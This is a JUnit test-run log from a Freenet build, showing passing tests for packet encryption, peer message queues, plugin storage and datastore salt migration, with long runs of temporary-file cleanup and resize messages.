    [junit] Testcase: testLostLastAck took 3,213 sec
    [junit] Testcase: testLoadStatsLowLevel took 0,208 sec
    [junit] Testcase: testLoadStatsHighLevel took 0,203 sec
    [junit] Testcase: testSequenceNumberEncryption took 8,279 sec
    [junit] Testcase: testReceiveUnknownMessageLength took 0,003 sec
    [junit] Testcase: testAckOnlyCreation took 0,402 sec
    [junit] Testcase: testEmptyCreation took 0,015 sec
    [junit] Testcase: testOutOfOrderDelivery took 0,003 sec
    [junit] Testcase: testEncryption took 0,548 sec
    [junit] Running freenet.node.NodeTest
    [junit] Testsuite: freenet.node.NodeTest
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,531 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,531 sec
    [junit] 
    [junit] Testcase: testDefaultStoreSizeSanity took 0,007 sec
    [junit] Running freenet.node.PeerMessageQueueTest
    [junit] Testsuite: freenet.node.PeerMessageQueueTest
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,6 sec
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,6 sec
    [junit] 
    [junit] Testcase: testUrgentTimeEmpty took 0,127 sec
    [junit] Testcase: testUrgentTime took 0,006 sec
    [junit] Testcase: testGrabQueuedMessageItem took 0,01 sec
    [junit] Testcase: testUrgentTimeQueuedWrong took 0,002 sec
    [junit] Running freenet.node.probe.ErrorTest
    [junit] Testsuite: freenet.node.probe.ErrorTest
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,616 sec
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,616 sec
    [junit] 
    [junit] Testcase: testValidCodes took 0,017 sec
    [junit] Testcase: testInvalidCodes took 0,005 sec
    [junit] Running freenet.node.probe.TypeTest
    [junit] Testsuite: freenet.node.probe.TypeTest
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,475 sec
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,475 sec
    [junit] 
    [junit] Testcase: testValidCodes took 0,012 sec
    [junit] Testcase: testInvalidCodes took 0,006 sec
    [junit] Running freenet.pluginmanager.PluginStoreTest
    [junit] Testsuite: freenet.pluginmanager.PluginStoreTest
    [junit] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,383 sec
    [junit] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,383 sec
    [junit] 
    [junit] Testcase: testStringsWithInvalidChars took 0,039 sec
    [junit] Testcase: testWriteStringArrays took 0,004 sec
    [junit] Testcase: testRandom took 0,733 sec
    [junit] Running freenet.store.PubkeyStoreTest
    [junit] Testsuite: freenet.store.PubkeyStoreTest
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi948726083168094314lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 2,803 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 2,803 sec
    [junit] ------------- Standard Output ---------------
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testSimple took 2,369 sec
    [junit] Running freenet.store.RAMSaltMigrationTest
    [junit] Testsuite: freenet.store.RAMSaltMigrationTest
    [junit] HmacSHA256: using SunJCE version 1.7
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi7194115120188342437lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12211695ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12343605ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-0-true/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-0-false/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-0-false/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-0-false/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-50-false/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-50-false/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-50-false/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-0-true/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-0-true/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-0-true/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-0-true/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Successfully closed store teststore
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Successfully closed store teststore
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Successfully closed store teststore
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Successfully closed store teststore
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-false
    [junit] Resizing datastore teststore
    [junit] Waiting for resize to complete...
    [junit] WrapperManager: Initializing...
    [junit] WrapperManager: WARNING - The wrapper.native_library system property was not
    [junit] WrapperManager:           set. Using the default value, 'wrapper'.
    [junit] WrapperManager: WARNING - The version of the Wrapper which launched this JVM is 
    [junit] WrapperManager:           "unknown" while the version of the native library 
    [junit] WrapperManager:           is "3.5.14".
    [junit] WrapperManager:           The Wrapper may appear to work correctly but some features may
    [junit] WrapperManager:           not function correctly.  This configuration has not been tested
    [junit] WrapperManager:           and is not supported.
    [junit] WrapperManager: 
    [junit] teststore cleaner in progress: 0/10
    [junit] Completed shrink, old size was 10 new size was 20 size is now 20 (prev=0)
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Waiting for resize to complete...
    [junit] Resizing datastore teststore
    [junit] teststore cleaner in progress: 0/10
    [junit] Completed shrink, old size was 10 new size was 20 size is now 20 (prev=0)
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Successfully closed store teststore
    [junit] Resizing datastore teststore
    [junit] Waiting for resize to complete...
    [junit] teststore cleaner in progress: 0/10
    [junit] Completed shrink, old size was 10 new size was 20 size is now 20 (prev=0)
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Waiting for resize to complete...
    [junit] Resizing datastore teststore
    [junit] teststore cleaner in progress: 0/10
    [junit] Completed shrink, old size was 10 new size was 20 size is now 20 (prev=0)
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] teststore cleaner in progress: 0/20
    [junit] Successfully closed store teststore
    [junit] Resizing datastore (teststore)
    [junit] Resizing datastore teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.hd
    [junit] Successfully closed store teststore
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Waiting for resize to complete...
    [junit] Resizing datastore teststore
    [junit] teststore cleaner in progress: 0/10
    [junit] Completed shrink, old size was 10 new size was 20 size is now 20 (prev=0)
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Successfully closed store teststore
    [junit] Waiting for resize to complete...
    [junit] Resizing datastore teststore
    [junit] teststore cleaner in progress: 0/10
    [junit] Completed shrink, old size was 10 new size was 20 size is now 20 (prev=0)
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] teststore cleaner in progress: 0/20
    [junit] Successfully closed store teststore
    [junit] Resizing datastore (teststore)
    [junit] Resizing datastore teststore
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-false/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-false/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-false/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter
    [junit] Tests run: 8, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 28,825 sec
    [junit] Tests run: 8, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 28,825 sec
    [junit] ------------- Standard Output ---------------
    [junit] HmacSHA256: using SunJCE version 1.7
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12211695ns
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.hd
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12343605ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Resizing datastore teststore
    [junit] WrapperManager: Initializing...
    [junit] WrapperManager: WARNING - The wrapper.native_library system property was not
    [junit] WrapperManager:           set. Using the default value, 'wrapper'.
    [junit] WrapperManager: WARNING - The version of the Wrapper which launched this JVM is 
    [junit] WrapperManager:           "unknown" while the version of the native library 
    [junit] WrapperManager:           is "3.5.14".
    [junit] WrapperManager:           The Wrapper may appear to work correctly but some features may
    [junit] WrapperManager:           not function correctly.  This configuration has not been tested
    [junit] WrapperManager:           and is not supported.
    [junit] WrapperManager: 
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Resizing datastore teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Resizing datastore teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Resizing datastore teststore
    [junit] Successfully closed store teststore
    [junit] Resizing datastore (teststore)
    [junit] Resizing datastore teststore
    [junit] Successfully closed store teststore
    [junit] Resizing datastore teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Resizing datastore teststore
    [junit] Successfully closed store teststore
    [junit] Resizing datastore (teststore)
    [junit] Resizing datastore teststore
    [junit] Successfully closed store teststore
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-0-true/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-0-false/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-0-false/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-0-false/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-50-false/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-50-false/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-50-false/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-0-true/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-0-true/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-0-true/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-0-true/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-false
    [junit] Waiting for resize to complete...
    [junit] teststore cleaner in progress: 0/10
    [junit] Completed shrink, old size was 10 new size was 20 size is now 20 (prev=0)
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Waiting for resize to complete...
    [junit] teststore cleaner in progress: 0/10
    [junit] Completed shrink, old size was 10 new size was 20 size is now 20 (prev=0)
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Waiting for resize to complete...
    [junit] teststore cleaner in progress: 0/10
    [junit] Completed shrink, old size was 10 new size was 20 size is now 20 (prev=0)
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Waiting for resize to complete...
    [junit] teststore cleaner in progress: 0/10
    [junit] Completed shrink, old size was 10 new size was 20 size is now 20 (prev=0)
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] teststore cleaner in progress: 0/20
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Waiting for resize to complete...
    [junit] teststore cleaner in progress: 0/10
    [junit] Completed shrink, old size was 10 new size was 20 size is now 20 (prev=0)
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.config
